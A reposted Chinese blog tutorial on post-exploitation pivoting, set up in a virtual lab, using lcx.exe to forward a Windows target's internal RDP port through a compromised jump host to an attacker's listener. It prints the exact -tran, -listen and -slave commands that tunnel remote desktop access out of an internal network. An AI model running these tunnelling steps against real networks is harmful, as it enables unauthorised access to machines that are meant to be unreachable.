后渗透——利用lcx反弹端口获取内网机器远程桌面

使用场景
外网不能访问内网目标机,但是可以访问内网跳板机,目标机3389端口只能本地访问,此时我们要用外网连接目标机的远程桌面

如图:
在这里插入图片描述

在这里插入图片描述

实验环境:

  • Windows Server 2008 R2 x64(跳板机)
  • Windows Server 2003(目标机)
  • lcx.exe
Lcx工具有三个参数功能如下:
listen 监听端口
tran 将一个端口的流量转发到另一个端口
slave 将两个端口进行连接

在这里插入图片描述

环境搭建:

为win2008添加一块网卡,ip设为10.1.1.1
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

将win2003的网络选成VM1
在这里插入图片描述
将ip设为10.1.1.2
在这里插入图片描述
在这里插入图片描述
此时win2003与win2008是可以ping通的
在这里插入图片描述
win2003右键我的电脑开启远程桌面
在这里插入图片描述
将lcx.exe上传到两台机器上,模拟已拿到两台机器的控制权限

在这里插入图片描述

模拟实验:

先在win2003输入lcx.exe -tran 8080 127.0.0.1 3389
在这里插入图片描述

物理机上输入lcx.exe -listen 4444 5555
在这里插入图片描述
然后win2008输入lcx.exe -slave 192.168.0.14 4444 10.1.1.2 8080
在这里插入图片描述

然后远程桌面连接127.0.0.1:5555
在这里插入图片描述
在这里插入图片描述

发布了95 篇原创文章 · 获赞 924 · 访问量 15万+

猜你喜欢

转载自blog.csdn.net/weixin_45728976/article/details/104928276